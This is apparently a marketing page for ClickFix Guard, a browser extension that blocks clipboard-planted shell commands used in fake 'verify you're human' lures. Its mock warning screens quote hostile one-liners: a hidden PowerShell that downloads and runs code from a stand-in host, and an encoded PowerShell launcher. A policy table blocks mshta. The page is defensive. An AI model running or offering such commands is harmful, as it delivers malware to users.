ClickFix and FileFix turn your own users into the delivery mechanism - no exploit, no attachment, nothing for antivirus to catch. ClickFix Guard intercepts the malicious command the instant a site tries to plant it, before your user ever hits paste.
Deploys as a managed browser extension · Live in minutes · No agent, no endpoint reboot
account-verify-human.top tried to copy this command:
powershell -w h -nop -c "iex(irm https://a[.]top/x)"
Sites that ask you to paste into Run, Terminal or PowerShell are almost always scams - even when they look like a CAPTCHA. Don't run anything this page asks you to.
ClickFix skips the exploit entirely. The page shows a “verify you're human” box, tells the user to press Win+R, paste, and hit Enter - and the payload runs with the user's own hands. FileFix does the same through the File Explorer address bar. It's one of the fastest-growing initial-access techniques in the wild, and your stack was never built to see it.
No file touches disk. The “malware” is a line of text on the clipboard until the user runs it themselves.
By the time PowerShell spawns, the command is already executing. Detection becomes incident response.
The lure is a normal-looking web page - often on a brand-new domain that no blocklist has caught up to.
We don't chase the payload - we own the clipboard. The malicious command is replaced the moment it's written, so there's nothing to paste, nothing to run, and nothing to clean up.
Three moves, all at the browser - no endpoint agent, no proxy, no reboot.
ClickFix Guard wraps the clipboard API in every tab. When a page writes something that looks like a shell command, we catch it at the source - before it's ever pasteable.
The payload is swapped out and a full-screen warning takes over the page - branded as your team, not a scary extension. The real command never reaches the clipboard or its history.
Genuinely need it? The user requests access in one click. Automated triage weighs the domain's reputation and the command itself, then approves, denies, or escalates to your team.
From the block screen your users see to the policy engine your team runs - here's the real thing.
get-verified.click tried to copy this command:
cmd /c start /min powershell -e SQBFAFgAKA...
This looked like a “verify you're human” step. It isn't. Don't paste or run anything this page asked you to.
A hijacked page becomes a teaching moment. Fully brandable - your logo, colors and copy - so users trust it and learn to spot the lure.
Blocks, would-blocks, open requests and enforcement coverage - status colors where they mean something, monochrome where they don't.
Brand-new domain impersonating a payroll portal, staging an obfuscated PowerShell download. No legitimate reason to run this.
Every request carries a live reputation verdict - RDAP domain age, URLhaus, Safe Browsing, VirusTotal and Cloudflare Radar - plus an automated recommendation. Run it advisory, or let it act autonomously above a confidence threshold you set.
| Order | Action | Site | Content | Note |
|---|---|---|---|---|
| 10 | allow | docs.docker.com | command type | vendor install steps |
| 20 | allow | *.corp-intra.net | anything | internal tooling |
| 30 | block | * | command type · mshta | never allowed |
| 100 | block | * | anything | default-deny catch-all |
Think like a firewall: specific carve-outs on top, a locked default-deny at the bottom. Approvals slot themselves above whatever's blocking them, so “Always allow” actually works - automatically.
Nothing happens off the record. Actor, action, target, IP and status on every mutation and login - with failed sign-ins captured too.
Protection is the start. ClickFix Guard is a full operations console for running clipboard defense at scale.
Automated analysis of every access request - the command it staged plus the domain's reputation. Advisory or autonomous, with a confidence threshold you control and fail-safe escalation to a human.
RDAP age, URLhaus, Google Safe Browsing, VirusTotal and Cloudflare Radar - folded into one verdict on every request.
Allow and block rules with drag-to-reorder priority. First match wins, with locked global rules tenants can't override.
Every decision, login, role change and policy edit - actor, target, IP and status. Nothing off the record.
Custom permission-based roles, TOTP and passkeys, and org-wide mandatory MFA enforced at the door.
One-tap approve/deny straight from Microsoft Teams or ntfy - even from your phone, no login required (or require sign-in for high-security tenants).
Logo, colors and copy on the block screen. Users see IT they trust, and learn to recognize the lure.
Run in audit mode to see what would block, get readiness signals, then flip to enforce with confidence.
A managed browser extension and a policy bundle. No endpoint agent, no proxy, no reboots.
Every client isolated. Every technician scoped to exactly the tenants they manage. One policy engine, branded per client, run from one console.
| Client | Mode | Devices | Blocks (7d) |
|---|---|---|---|
| Acme Manufacturing | enforce | 640 | 418 |
| Northwind Health | enforce | 512 | 377 |
| Contoso Legal | audit | 210 | 96 |
| Fabrikam Retail | enforce | 488 | 301 |
| Tailspin Logistics | audit | 340 | 92 |
ClickFix Guard is the defense designed for clipboard-borne social engineering - a threat class that didn't have an answer until now.
Start a free trial, deploy the extension to a pilot group, and watch the blocks roll in. Flip to enforce when you're ready.
Free trial → paid. No credit card to start. No sales call required.